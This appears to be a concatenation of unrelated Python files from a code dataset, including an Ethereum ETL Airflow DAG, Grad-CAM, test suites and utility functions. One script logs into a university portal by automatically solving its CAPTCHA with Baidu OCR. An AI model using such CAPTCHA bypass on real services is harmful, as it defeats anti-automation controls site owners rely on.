def __init__(self, config, debug=False):
self.debug = debug
if debug:
config['lead_ip'] = 'localhost'
self.leadNode = LeadNode(config['lead_ip'], config['lead_port'])
self.port = config['port']
self._version = config['version']
self.storage_units = config['storage_units']
self.neighbours = {}
self.server = Server(self, hex(get_mac()), self.get_ip(), self.port)
def start(self):
self.server.start()
self.register()
def add_neighbour(self, mac, ip, port, units):
self.neighbours[mac] = Node(ip, port, units)
def read_file(self, filepath):
with open(filepath, "rb") as file:
return file.read() # TODO: Serialize before return
def write_file(self, name, content):
with open(name, "wb") as file:
file.write(content)
self.register_location(name)
return True
return False
def pick_and_repeat(self, name, content, ttl):
for mac, node in self.neighbours:
# TODO: Criteria
node.write_repeat(name, content, ttl)
break # Escape for loop
def make_payload(self, method, params):
return {
"method": method,
"params": params,
"jsonrpc": "2.0",
"id": 0,
}
def get_ip(self):
if self.debug:
return "localhost"
else:
return ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
def register(self):
try:
payload = self.make_payload(
"register_node",
{
"ip": self.get_ip(),
"mac": hex(get_mac()),
"version": self._version,
"port": self.port,
"units": self.storage_units
}
)
response = self.leadNode.call(payload)
except:
time.sleep(20)
self.register()
def register_location(self, file_name):
respone = self.leadNode.call(
self.make_payload(
"register_location",
{
"file_name": file_name,
"location": hex(get_mac()),
}
)
)
if __name__ == "__main__":
debug = (len(sys.argv) > 1 and sys.argv[1] == '--debug')
with open('config.json') as config_file:
client = ClientNode(json.load(config_file), debug)
client.start()
| StarcoderdataPython |
144566 | <gh_stars>1-10
from datetime import datetime, timedelta
def get_next_monday(now=datetime.now()):
for _ in range(8):
if now.weekday() == 0:
return now.date()
else:
now = now + timedelta(days=1)
def get_actual_monday(now=datetime.now()):
for _ in range(8):
if now.weekday() == 0:
return now.date()
else:
now = now - timedelta(days=1)
| StarcoderdataPython |
1766518 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class KoubeiMerchantKbcloudSubuserloginstatusQueryModel(object):
def __init__(self):
self._session_id = None
self._sub_user_id = None
@property
def session_id(self):
return self._session_id
@session_id.setter
def session_id(self, value):
self._session_id = value
@property
def sub_user_id(self):
return self._sub_user_id
@sub_user_id.setter
def sub_user_id(self, value):
self._sub_user_id = value
def to_alipay_dict(self):
params = dict()
if self.session_id:
if hasattr(self.session_id, 'to_alipay_dict'):
params['session_id'] = self.session_id.to_alipay_dict()
else:
params['session_id'] = self.session_id
if self.sub_user_id:
if hasattr(self.sub_user_id, 'to_alipay_dict'):
params['sub_user_id'] = self.sub_user_id.to_alipay_dict()
else:
params['sub_user_id'] = self.sub_user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = KoubeiMerchantKbcloudSubuserloginstatusQueryModel()
if 'session_id' in d:
o.session_id = d['session_id']
if 'sub_user_id' in d:
o.sub_user_id = d['sub_user_id']
return o
| StarcoderdataPython |
3262393 | <filename>output/models/nist_data/list_pkg/decimal/schema_instance/nistschema_sv_iv_list_decimal_min_length_1_xsd/__init__.py<gh_stars>1-10
from output.models.nist_data.list_pkg.decimal.schema_instance.nistschema_sv_iv_list_decimal_min_length_1_xsd.nistschema_sv_iv_list_decimal_min_length_1 import NistschemaSvIvListDecimalMinLength1
__all__ = [
"NistschemaSvIvListDecimalMinLength1",
]
| StarcoderdataPython |
3221614 | <gh_stars>1-10
from __future__ import print_function
import collections
import logging
import os
from datetime import datetime, timedelta
from glob import glob
from airflow import models
from airflow.operators.bash_operator import BashOperator
from airflow.operators.email_operator import EmailOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.sensors import ExternalTaskSensor
from google.cloud import bigquery
from ethereumetl_airflow.bigquery_utils import create_view, share_dataset_all_users_read
from ethereumetl_airflow.common import read_json_file, read_file
from ethereumetl_airflow.parse.parse_logic import ref_regex, parse, create_dataset
logging.basicConfig()
logging.getLogger().setLevel(logging.DEBUG)
dags_folder = os.environ.get('DAGS_FOLDER', '/home/airflow/gcs/dags')
def build_parse_dag(
dag_id,
dataset_folder,
parse_destination_dataset_project_id,
notification_emails=None,
parse_start_date=datetime(2018, 7, 1),
schedule_interval='0 0 * * *',
parse_all_partitions=None,
send_success_email=False
):
logging.info('parse_all_partitions is {}'.format(parse_all_partitions))
if parse_all_partitions:
dag_id = dag_id + '_FULL'
if 'ethereum_kovan_parse' in dag_id:
SOURCE_PROJECT_ID = 'public-data-finance'
SOURCE_DATASET_NAME = 'crypto_ethereum_kovan'
PARTITION_DAG_ID = 'ethereum_kovan_partition_dag'
else:
SOURCE_PROJECT_ID = 'bigquery-public-data'
SOURCE_DATASET_NAME = 'crypto_ethereum'
PARTITION_DAG_ID = 'ethereum_partition_dag'
default_dag_args = {
'depends_on_past': True,
'start_date': parse_start_date,
'email_on_failure': True,
'email_on_retry': False,
'retries': 5,
'retry_delay': timedelta(minutes=5)
}
if notification_emails and len(notification_emails) > 0:
default_dag_args['email'] = [email.strip() for email in notification_emails.split(',')]
dag = models.DAG(
dag_id,
catchup=False,
schedule_interval=schedule_interval,
default_args=default_dag_args)
validation_error = None
try:
validate_definition_files(dataset_folder)
except ValueError as e:
validation_error = e
# This prevents failing all dags as they are constructed in a loop in ethereum_parse_dag.py
if validation_error is not None:
def raise_validation_error(ds, **kwargs):
raise validation_error
validation_error_operator = PythonOperator(
task_id='validation_error',
python_callable=raise_validation_error,
provide_context=True,
execution_timeout=timedelta(minutes=10),
dag=dag
)
return dag
def create_parse_task(table_definition):
def parse_task(ds, **kwargs):
client = bigquery.Client()
parse(
bigquery_client=client,
table_definition=table_definition,
ds=ds,
source_project_id=SOURCE_PROJECT_ID,
source_dataset_name=SOURCE_DATASET_NAME,
destination_project_id=parse_destination_dataset_project_id,
sqls_folder=os.path.join(dags_folder, 'resources/stages/parse/sqls'),
parse_all_partitions=parse_all_partitions
)
table_name = table_definition['table']['table_name']
parsing_operator = PythonOperator(
task_id=table_name,
python_callable=parse_task,
provide_context=True,
execution_timeout=timedelta(minutes=60),
dag=dag
)
contract_address = table_definition['parser']['contract_address']
if contract_address is not None:
ref_dependencies = ref_regex.findall(table_definition['parser']['contract_address'])
else:
ref_dependencies = []
return parsing_operator, ref_dependencies
def create_add_view_task(dataset_name, view_name, sql):
def create_view_task(ds, **kwargs):
client = bigquery.Client()
dest_table_name = view_name
dest_table_ref = create_dataset(client, dataset_name, parse_destination_dataset_project_id).table(dest_table_name)
print('View sql: \n' + sql)
create_view(client, sql, dest_table_ref)
create_view_operator = PythonOperator(
task_id=f'create_view_{view_name}',
python_callable=create_view_task,
provide_context=True,
execution_timeout=timedelta(minutes=10),
dag=dag
)
return create_view_operator
def create_share_dataset_task(dataset_name):
def share_dataset_task(**kwargs):
if parse_destination_dataset_project_id != 'blockchain-etl':
logging.info('Skipping sharing dataset.')
else:
client = bigquery.Client()
share_dataset_all_users_read(client, f'{parse_destination_dataset_project_id}.{dataset_name}')
share_dataset_all_users_read(client, f'{parse_destination_dataset_project_id}-internal.{dataset_name}')
share_dataset_operator = PythonOperator(
task_id='share_dataset',
python_callable=share_dataset_task,
provide_context=True,
execution_timeout=timedelta(minutes=10),
dag=dag
)
return share_dataset_operator
wait_for_ethereum_load_dag_task = ExternalTaskSensor(
task_id='wait_for_ethereum_partition_dag',
external_dag_id=PARTITION_DAG_ID,
external_task_id='done',
execution_delta=timedelta(minutes=30),
priority_weight=0,
mode='reschedule',
poke_interval=5 * 60,
timeout=60 * 60 * 12,
dag=dag)
json_files = get_list_of_files(dataset_folder, '*.json')
logging.info(json_files)
all_parse_tasks = {}
task_dependencies = {}
for json_file in json_files:
table_definition = read_json_file(json_file)
task, dependencies = create_parse_task(table_definition)
wait_for_ethereum_load_dag_task >> task
all_parse_tasks[task.task_id] = task
task_dependencies[task.task_id] = dependencies
checkpoint_task = BashOperator(
task_id='parse_all_checkpoint',
bash_command='echo parse_all_checkpoint',
priority_weight=1000,
dag=dag
)
for task, dependencies in task_dependencies.items():
for dependency in dependencies:
if dependency not in all_parse_tasks:
raise ValueError(
'Table {} is not found in the the dataset. Check your ref() in contract_address field.'.format(
dependency))
all_parse_tasks[dependency] >> all_parse_tasks[task]
all_parse_tasks[task] >> checkpoint_task
final_tasks = [checkpoint_task]
dataset_name = os.path.basename(dataset_folder)
full_dataset_name = 'ethereum_' + dataset_name
share_dataset_task = create_share_dataset_task(full_dataset_name)
checkpoint_task >> share_dataset_task
final_tasks.append(share_dataset_task)
# Create views
sql_files = get_list_of_files(dataset_folder, '*.sql')
logging.info(sql_files)
for sql_file in sql_files:
sql = read_file(sql_file)
base_name = os.path.basename(sql_file)
view_name = os.path.splitext(base_name)[0]
create_view_task = create_add_view_task(full_dataset_name, view_name, sql)
checkpoint_task >> create_view_task
final_tasks.append(create_view_task)
if notification_emails and len(notification_emails) > 0 and send_success_email:
send_email_task = EmailOperator(
task_id='send_email',
to=[email.strip() for email in notification_emails.split(',')],
subject='Ethereum ETL Airflow Parse DAG Succeeded',
html_content='Ethereum ETL Airflow Parse DAG Succeeded for {}'.format(dag_id),
dag=dag
)
for final_task in final_tasks:
final_task >> send_email_task
return dag
def get_list_of_files(dataset_folder, filter='*.json'):
logging.info('get_list_of_files')
logging.info(dataset_folder)
logging.info(os.path.join(dataset_folder, filter))
return [f for f in glob(os.path.join(dataset_folder, filter))]
def validate_definition_files(dataset_folder):
json_files = get_list_of_files(dataset_folder, '*.json')
dataset_folder_name = dataset_folder.split('/')[-1]
all_lowercase_table_names = []
for json_file in json_files:
file_name = json_file.split('/')[-1].replace('.json', '')
table_definition = read_json_file(json_file)
table = table_definition.get('table')
if not table:
raise ValueError(f'table is empty in file {json_file}')
dataset_name = table.get('dataset_name')
if not dataset_name:
raise ValueError(f'dataset_name is empty in file {json_file}')
if dataset_folder_name != dataset_name:
raise ValueError(f'dataset_name {dataset_name} is not equal to dataset_folder_name {dataset_folder_name}')
table_name = table.get('table_name')
if not table_name:
raise ValueError(f'table_name is empty in file {json_file}')
if file_name != table_name:
raise ValueError(f'file_name {file_name} doest match the table_name {table_name}')
all_lowercase_table_names.append(table_name.lower())
table_name_counts = collections.defaultdict(lambda: 0)
for table_name in all_lowercase_table_names:
table_name_counts[table_name] += 1
non_unique_table_names = [name for name, count in table_name_counts.items() if count > 1]
if len(non_unique_table_names) > 0:
raise ValueError(f'The following table names are not unique {",".join(non_unique_table_names)}') | StarcoderdataPython |
1754074 |
import numpy as np
from pylbm.stencil import Velocity
import pytest
import random
def test_velocity_argument():
with pytest.raises(Exception):
Velocity()
@pytest.mark.parametrize('dim, axis',
[(1, [None, 0]),
(2, [None, 0, 1]),
(3, [None, 0, 1, 2])])
def test_symmetric(dim, axis):
for i in np.random.randint(1000, size=100):
v = Velocity(dim=dim, num=i)
for a in axis:
vs = v.get_symmetric(axis=a).get_symmetric(axis=a)
assert(vs.v == v.v and vs.num == v.num)
@pytest.mark.parametrize('dim', [1, 2, 3])
def test_symmetric_shuffle(dim):
for i in np.random.randint(1000, size=100):
v = Velocity(dim=dim, num=i)
axis = np.random.randint(dim, size=5)
vs = v
for a in axis:
vs = vs.get_symmetric(axis=a)
for a in axis[::-1]:
vs = vs.get_symmetric(axis=a)
assert(vs.v == v.v and vs.num == v.num)
| StarcoderdataPython |
3398993 | /usr/local/lib/python2.7/posixpath.py | StarcoderdataPython |
3219561 | <gh_stars>1-10
from __future__ import unicode_literals
import frappe
def get_context(context):
# do your magic here
context.title = "Agent Application"
# context.show_sidebar = 1
# context.add_breadcrumbs = 1
| StarcoderdataPython |
3382313 | <reponame>rojinva/music-recommendations_Hybrid
from datetime import datetime
import pandas
from app.DataReader import DataReader, DataSource
class SongFeatureSimilarity:
data_reader = DataReader()
SONG_DATA = {}
CACHED_SIMILARITIES = {}
def __init__(self):
entries = self.data_reader.read_file(DataSource.SONGS)
for index, row in entries.iterrows():
self.SONG_DATA[row['song_id']] = row
def compute_song_to_song_similarity(self, song_a_id, song_b_id):
if song_a_id in self.CACHED_SIMILARITIES.keys():
if song_b_id in self.CACHED_SIMILARITIES[song_a_id].keys():
return self.CACHED_SIMILARITIES[song_a_id][song_b_id]
score = self.__calculate_similarity(song_a_id, song_b_id)
self.__cache_similarity(song_a_id, song_b_id, score)
return score
def __cache_similarity(self, song_a_id, song_b_id, similarity):
if song_a_id not in self.CACHED_SIMILARITIES.keys():
self.CACHED_SIMILARITIES[song_a_id] = {}
self.CACHED_SIMILARITIES[song_a_id][song_b_id] = similarity
if song_b_id not in self.CACHED_SIMILARITIES.keys():
self.CACHED_SIMILARITIES[song_b_id] = {}
self.CACHED_SIMILARITIES[song_b_id][song_a_id] = similarity
def __calculate_similarity(self, song_a_id, song_b_id):
song_a = self.SONG_DATA[song_a_id]
song_b = self.SONG_DATA[song_b_id]
score = self._compute_song_to_song_similarity(song_a, song_b)
return score
def parse_list(self, entity):
return list(map(lambda a: a.strip(), entity.split('|')))
def get_similarity_for_feature(self, song_a, song_b, feature):
if pandas.isnull(song_a[feature]) or pandas.isnull(song_b[feature]):
return 0.0
if type(song_a[feature]) is float:
return 1.0 if song_a[feature] == song_b[feature] else 0.0
song_a_list = self.parse_list(song_a[feature])
song_b_list = self.parse_list(song_b[feature])
intersection = list(set(song_a_list) & set(song_b_list))
return float(len(intersection)) / (len(song_a_list) + len(song_b_list))
def _compute_song_to_song_similarity(self, song_a, song_b):
total_similarity = 0.0
feature_names = ['genre_ids', 'artist_name', 'composer', 'lyricist',
'language']
for feature in feature_names:
feature_similarity = self.get_similarity_for_feature(song_a, song_b,
feature)
total_similarity += feature_similarity
return total_similarity / len(feature_names)
class SongsFeatureSimilarityStats:
MIN_SIMILARITY = 0.1
SONG_TO_SONG_SIMILARITY = {}
data_reader = DataReader()
ifs = SongFeatureSimilarity()
def compute_pairwise_similarities(self):
count = 0
start_timer = datetime.now()
for index, entry_a in entries.iterrows():
count += 1
if count % 1000 == 0:
print("Features " + str(count))
print(datetime.now() - start_timer)
start_timer = datetime.now()
to_others_similarity = {}
for index, entry_b in entries.iterrows():
if entry_a['song_id'] is not entry_b['song_id']:
similarity = self.ifs.compute_song_to_song_similarity(entry_a,
entry_b)
if similarity > self.MIN_SIMILARITY:
to_others_similarity[entry_b['song_id']] = similarity
self.SONG_TO_SONG_SIMILARITY[entry_a['song_id']] = to_others_similarity
| StarcoderdataPython |
3216055 | <reponame>powerboat9-school/UDT
MIN_SIG = 17000
MAX_SIG = 19000
BIN_SIZE = math.floor((MAX_SIG - MIN_SIG) / 32)
def getSignal(num):
if num == None || !isinstance(num, int) || int < 0 || int > 31:
raise Exception("Invalid signal")
return MIN_SIG + BIN_SIZE * num
def translate():
def snd(msg):
if msg == None || !isinstance(msg, str):
raise Exception("Could not send type " + type(msg))
| StarcoderdataPython |
1610569 | <reponame>nanofrog/asyncflow<gh_stars>10-100
import sys
sys.path.append("../flowchart/generate")
import asyncflow
import Flowchart_AI
import Flowchart_Subchart
import time
import asyncflow
from io import StringIO
import pytest
class EventId():
Event0Arg = 3
Event1Arg = 4
Event2Arg = 5
class Character:
allCharacter = []
def __init__(self):
self.output = []
def Say(self, s):
#print(s)
self.output.append(str(s))
def CreateCharacter(self):
char = Character()
Character.allCharacter.append(char)
char.output = self.output
asyncflow.register(char)
asyncflow.start(char)
return char
eventlist = {
1: [ 3 ],
2: [ 4, " hello" ],
3: [ 5, " first", " second" ]
}
#SubchartTest_07,SubchartTest_08,SubchartTest_09 的输出次数受子图是否立刻执行的影响
testdata = [
("AI.test_01", 0, {}, ["hello"])
, ("AI.test_02", 0, {}, ["0", "1000"])
, ("AI.test_03", 0, {}, ["hello"])
, ("AI.test_04", 2, {}, ["hello", "world", "0", "hello", "world", "1000", "hello", "world", "2000"])
, ("AI.test_05", 0, eventlist, ["event 0 pass", "event 1 pass hello", "event 2 pass", "1st arg first", "2nd arg second"])
, ("AI.test_06", 0, {}, ["subunit pass"])
, ("AI.test_07", 0, {}, ["1", "2", "3", "3", "4", "7", "7"])
, ("AI.test_09", 0, {}, ["node 1", "node 2", "node 3", "all node runned"])
, ("AI.test_10", 0, eventlist, ["event 0 pass", "event 1 pass hello", "event 2 pass", "1st arg first", "2nd arg second"])
, ("AI.test_11", 0, {}, ["hello sub", "subunit pass", "green"])
, ("AI.test_12", 0, {}, ["1", "2"])
, ("AI.test_13", 0, {}, ["hello"])
, ("AI.test_14", 3, {}, ["1", "2", "3", "4", "1", "2", "3", "4","1", "2", "3", "4","1", "2", "3", "4"])
, ("AI.test_15", 0, {}, ["1000", "2000", "6000"])
, ("AI.test_16", 0, eventlist, ["1000", "2000", "2200"])
, ("AI.test_17", 0, {}, ["1000", "1000", "2000", "4000"])
,("Subchart.SubchartTest_01", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
,("Subchart.SubchartTest_02", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_03", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_04", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_05", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_06", 5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_07", 0.5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_08", 0.5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_09", 0.5, {},
["hello", "hellosub", "end", "hello", "hellosub", "end", "hello", "hellosub"])
, ("Subchart.SubchartTest_10", 5, {}, ["joinsub", "end","joinsub", "end","joinsub", "end", "joinsub", "end", "joinsub"])
, ("Subchart.SubchartTest_11", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
, ("Subchart.SubchartTest_12", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
, ("Subchart.SubchartTest_13", 0, {}, ["hellosub", "hellosub", "hellosub", "end"])
]
def RaiseEvent(obj, event_list, step):
#运行到21frame,2.1s时开始抛出时间
step = step - 20
if step in event_list:
print("raise event ", step)
event_id = event_list[step][0]
asyncflow.event(obj, event_id, *event_list[step][1:])
@pytest.mark.parametrize("chart_name, run_time, event_list, result", testdata)
def test_RunCase(chart_name, run_time, event_list, result):
frame = 0
step_time = 100
run_time = run_time or 10
total_frames = int(run_time * 1000 // step_time)
print('total_frames', total_frames)
asyncflow.setup()
asyncflow.import_charts("../flowchart/generate/Flowchart_AI.json")
asyncflow.import_charts("../flowchart/generate/Flowchart_Subchart.json")
asyncflow.import_event("../flowchart/generate/event_info.json")
c = Character()
asyncflow.register(c)
asyncflow.attach(c, chart_name)
asyncflow.start(c)
asyncflow.step(0)
for i in range(total_frames):
for item in Character.allCharacter:
RaiseEvent(item, event_list, frame)
RaiseEvent(c, event_list, frame)
asyncflow.step(step_time)
frame = frame + 1
assert result == c.output
print('output', c.output)
asyncflow.deregister(c)
asyncflow.step(10)
asyncflow.exit()
def test_attach_chart_params():
asyncflow.setup()
asyncflow.import_charts("../flowchart/generate/Flowchart_AI.json")
asyncflow.import_event("../flowchart/generate/event_info.json")
c = Character()
agent = asyncflow.register(c)
tbl = dict()
params_tbl = dict()
params_tbl["x"] = 2
params_tbl["y"] = 3
params_tbl["ss"] = 4
def callback(value):
c.Say(value)
chart = asyncflow.attach(c,"AI.test_07_sub",params_tbl)
chart.set_callback(callback)
del chart
agent.start()
for i in range(10):
asyncflow.step(10)
assert ["2","3","5","5"] == c.output
for i in range(10):
c.output=[]
print(i)
asyncflow.start(c,["AI.test_07_sub"])
for i in range(10):
asyncflow.step(10)
assert c.output == ["2","3","5"]
asyncflow.remove(c,"AI.test_07_sub")
asyncflow.deregister(c)
asyncflow.step(10)
asyncflow.exit()
if __name__ == "__main__":
test_attach_chart_params()
for params in testdata:
test_RunCase(*params) | StarcoderdataPython |
154401 | <gh_stars>1-10
from typing import List
import numpy as np
from rdkit import Chem
from scoring.component_parameters import ComponentParameters
from scoring.score_components.base_score_component import BaseScoreComponent
from scoring.score_summary import ComponentSummary
class MatchingSubstructure(BaseScoreComponent):
def __init__(self, parameters: ComponentParameters):
super().__init__(parameters)
self.target_smarts = self.parameters.smiles # these are actually smarts
self._validate_inputs(self.parameters.smiles)
def calculate_score(self, molecules: List) -> ComponentSummary:
score = self._substructure_match(molecules, self.target_smarts)
score_summary = ComponentSummary(total_score=score, parameters=self.parameters)
return score_summary
def _smiles_to_fingerprints(self, smiles: List[str], radius=3, useCounts=True, useFeatures=True) -> []:
# This is intentionally doing nothing as the input is expected to be in smarts rather than in smiles
idx = []
fps = []
return fps, idx
def _substructure_match(self, query_mols, list_of_SMARTS):
if len(list_of_SMARTS) == 0:
return np.ones(len(query_mols), dtype=np.float32)
match = [any([mol.HasSubstructMatch(Chem.MolFromSmarts(subst)) for subst in list_of_SMARTS
if Chem.MolFromSmarts(subst)]) for mol in query_mols]
return 0.5 * (1 + np.array(match))
def _validate_inputs(self, smiles):
for smart in smiles:
if Chem.MolFromSmarts(smart) is None:
raise IOError(f"Invalid smarts pattern provided as a matching substructure: {smart}")
| StarcoderdataPython |
175466 | <filename>examples/election.py
import logging
import random
from tornado import gen
log = logging.getLogger()
def arguments(parser):
parser.add_argument(
"--workers", "-w", type=int, default=5,
help="Number of workers to launch."
)
parser.add_argument(
"--znode-path", "-p", type=str, default="examplelock",
help="ZNode path to use for the election."
)
@gen.coroutine
def run(client, args):
log.info("Launching %d workers.", args.workers)
yield client.start()
order = list(range(args.workers))
random.shuffle(order)
yield [worker(i, client, args) for i in order]
yield client.close()
@gen.coroutine
def worker(number, client, args):
election = client.recipes.LeaderElection(args.znode_path)
yield election.join()
if election.has_leadership:
log.info("[WORKER #%d] I am the leader!", number)
else:
log.info("[WORKER #%d] not the leader.", number)
yield election.resign()
| StarcoderdataPython |
3253071 | <reponame>sumit-158/fermulerpy<gh_stars>1-10
import math
import warnings
def get_divisors(n):
"""
Finds all divisors of a number
Parameters
----------
n : int
denotes the natural number of which divisors needs to be calculated
return : array
returns an array of divisors of n
"""
if(n<=0):
raise ValueError(
"n must be a positive integer"
)
list1 = []
list2 = []
for i in range(1,int(math.sqrt(n))+1):
if(n%i == 0):
if(i*i == n):
list1.append(i)
list1.append(i)
list2.append(n//i)
return list1 + list2[::-1]
def divisor_count(n):
"""
Calculates total number of divisors of given natural number i.e., d(n)
Parameters
----------
n : int
denotes the natural number of which divisor count needs to be calculated
return : int
returns an integer specifying number of divisors
"""
if(n<=0):
raise ValueError(
"n must be a natural number"
)
count=0
for i in range(1,int(math.sqrt(n))+1):
if(n%i == 0):
if(i*i == n):
count += 1
continue
count += 2
return count
def divisor_sum(n):
"""
Calculates the sum of all divisors of n i.e., σ(n)
Parameters
----------
n : int
denotes the natural number of which sum of divisors needs to be calculated
return : int
returns an integer specifying sum of divisors of n
"""
if(n<=0):
raise ValueError(
"n must be a positive integer"
)
sum = 0
for i in range(1,int(math.sqrt(n))+1):
if(n%i == 0):
if(i*i == n):
sum += i
continue
sum += i
sum += (n//i)
return sum
def divisor_product(n):
"""
Calculates the product of the divisors of positive integer n
Parameters
----------
n : int
denotes positive integer
return : int
returns an integer denoting product of all divisors of n
"""
if(n<=0 or n!=int(n)):
raise ValueError(
"n must be psotive integer"
)
divisors_count = divisor_count(n)
return int(n ** (divisors_count/2)) | StarcoderdataPython |
98118 | import cv2
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
class GradCAM():
def __init__(self, model, target_layer, use_cuda):
self.model = model.eval()
self.target_layer = target_layer
self.use_cuda = use_cuda
self.feature_map = 0
self.grad = 0
if self.use_cuda:
self.model = self.model.cuda()
for module in self.model.named_modules():
if module[0] == target_layer:
module[1].register_forward_hook(self.save_feature_map)
module[1].register_backward_hook(self.save_grad)
def save_feature_map(self, module, input, output):
self.feature_map = output.detach()
def save_grad(self, module, grad_in, grad_out):
self.grad = grad_out[0].detach()
def __call__(self, x, index=None):
x = x.clone()
if self.use_cuda:
x = x.cuda()
output = self.model(x)
if index == None:
index = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype = np.float32)
one_hot[0][index] = 1
one_hot = torch.from_numpy(one_hot)
one_hot.requires_grad_()
if self.use_cuda:
one_hot = torch.sum(one_hot.cuda() * output)
else:
one_hot = torch.sum(one_hot * output)
self.model.zero_grad()
one_hot.backward()
self.feature_map = self.feature_map.cpu().numpy()[0]
self.weights = np.mean(self.grad.cpu().numpy(), axis = (2, 3))[0, :]
cam = np.sum(self.feature_map * self.weights[:, None, None], axis=0)
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, (x.size()[-1], x.size()[-2]))
return cam, index
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255*mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
return np.uint8(255 * cam)
| StarcoderdataPython |
1773829 | from app import app as application
# chamado manualmente com: $ flask run
if __name__ == "__main__":
import os
application.run(host='0.0.0.0', port=os.getenv('SERVER_PORT'))
| StarcoderdataPython |
1614743 | <gh_stars>1-10
import base64
import requests
import os
import time
import json
import os.path as osp
from bs4 import BeautifulSoup
from utils.logger import *
tmp_dir = osp.join(osp.dirname(__file__), '..', 'tmp')
tmp_img_path = osp.join(tmp_dir, 'tmp.jpg')
logger = Logger.get_logger()
baidu_api_keys = json.load(open(osp.join(osp.dirname(__file__), '..', 'etc', 'baidu_api.json')))
API_KEY = baidu_api_keys['API_KEY'] # API Key
SECRET_KEY = baidu_api_keys['SECRET_KEY'] # Secret Key
TOKEN_URL = 'https://aip.baidubce.com/oauth/2.0/token' # 获取token请求url
OCR_URL = 'https://aip.baidubce.com/rest/2.0/ocr/v1/general_basic' # 文字识别OCRAPI
def baidu_text_api(img: bytes):
data = {
'grant_type': 'client_credentials',
'client_id': API_KEY,
'client_secret': SECRET_KEY
}
r = requests.post(TOKEN_URL, data=data)
if 'access_token' in r.json():
access_token = r.json().get('access_token')
else:
logger.info('Please check your APP_ID, SECRET_KEY!')
toast('Please check your APP_ID, SECRET_KEY!')
exit(-1)
print(access_token)
img = base64.b64encode(open(tmp_img_path, 'rb').read())
params = {"image": img}
access_token = access_token
request_url = OCR_URL + "?access_token=" + access_token
headers = {'content-type': 'application/x-www-form-urlencoded'}
response = requests.post(request_url, data=params, headers=headers)
try:
print(response.json())
verification_code = response.json()['words_result'][0]['words']
except:
verification_code = None
print(f'recognized code: {verification_code}')
return verification_code
def get_verification_code(session):
for _ in range(3):
img = session.get(f"https://passport.ustc.edu.cn/validatecode.jsp?type=login&x={int(time.time())}").content
if not osp.exists(tmp_dir):
os.makedirs(tmp_dir)
with open(tmp_img_path, 'wb') as f:
f.write(img)
verification_code = baidu_text_api(img)
if verification_code:
break
return verification_code
def login(session, username, password):
# login
# 1. get `CAS_LT`
response = session.get("https://passport.ustc.edu.cn/login?service=https%3A%2F%2Fweixine.ustc.edu.cn%2F2020%2Fcaslogin")
response = BeautifulSoup(response.content, 'lxml')
login_form = response.find_all(class_='loginForm form-style')[0]
CAS_LT = login_form.find_next(id='CAS_LT')['value']
# 2. get and crack the verification code
verification_code = get_verification_code(session)
data = {'username': username, 'password': password,
'showCode': '1', 'LT': verification_code, 'CAS_LT': CAS_LT,
'service': "https://weixine.ustc.edu.cn/2020/caslogin", 'model': "uplogin.jsp",
'warn': '', 'showCode': '', 'button': ''}
response = session.post("https://passport.ustc.edu.cn/login?service=https%3A%2F%2Fweixine.ustc.edu.cn%2F2020%2Fcaslogin", data=data)
response_html = BeautifulSoup(response.content, 'lxml').__str__()
print(f'登陆结果: {response}')
return response_html | StarcoderdataPython |
4825135 | <filename>Extras/011 - The Time in Words/TimeInWords.py<gh_stars>1-10
def timeInWords(h, m):
stringHours = ['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve']
stringMinutes = ['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve',
'thirteen', 'fourteen', 'quarter', 'sixteen', 'seventeen', 'eighteen', 'nineteen', 'twenty', 'twenty one', 'twenty two',
'twenty three', 'twenty four', 'twenty five', 'twenty six', 'twenty seven', 'twenty eight', 'twenty nine', 'half']
newHour = h
newMinutes = m
stringTime = ''
if (m > 30):
newMinutes = 60 - m
newHour = h + 1
hourStringPrefix = 'to' if (newHour > h) else 'past'
if (newHour > 12): newHour = 1
if (newMinutes == 0):
stringTime = f"{stringHours[newHour - 1]} o' clock"
elif (newMinutes == 1):
stringTime = f"{stringMinutes[newMinutes - 1]} minute {hourStringPrefix} {stringHours[newHour - 1]}"
elif (newMinutes == 15 or newMinutes == 30):
stringTime = f"{stringMinutes[newMinutes - 1]} {hourStringPrefix} {stringHours[newHour - 1]}"
else:
stringTime = f"{stringMinutes[newMinutes - 1]} minutes {hourStringPrefix} {stringHours[newHour - 1]}"
return stringTime
print(timeInWords(12, 38)) | StarcoderdataPython |
82830 | <filename>app/toyApp/apps.py
from django.apps import AppConfig
class ToyappConfig(AppConfig):
name = 'toyApp'
| StarcoderdataPython |
12956 | <filename>lldb/examples/summaries/cocoa/NSException.py
"""
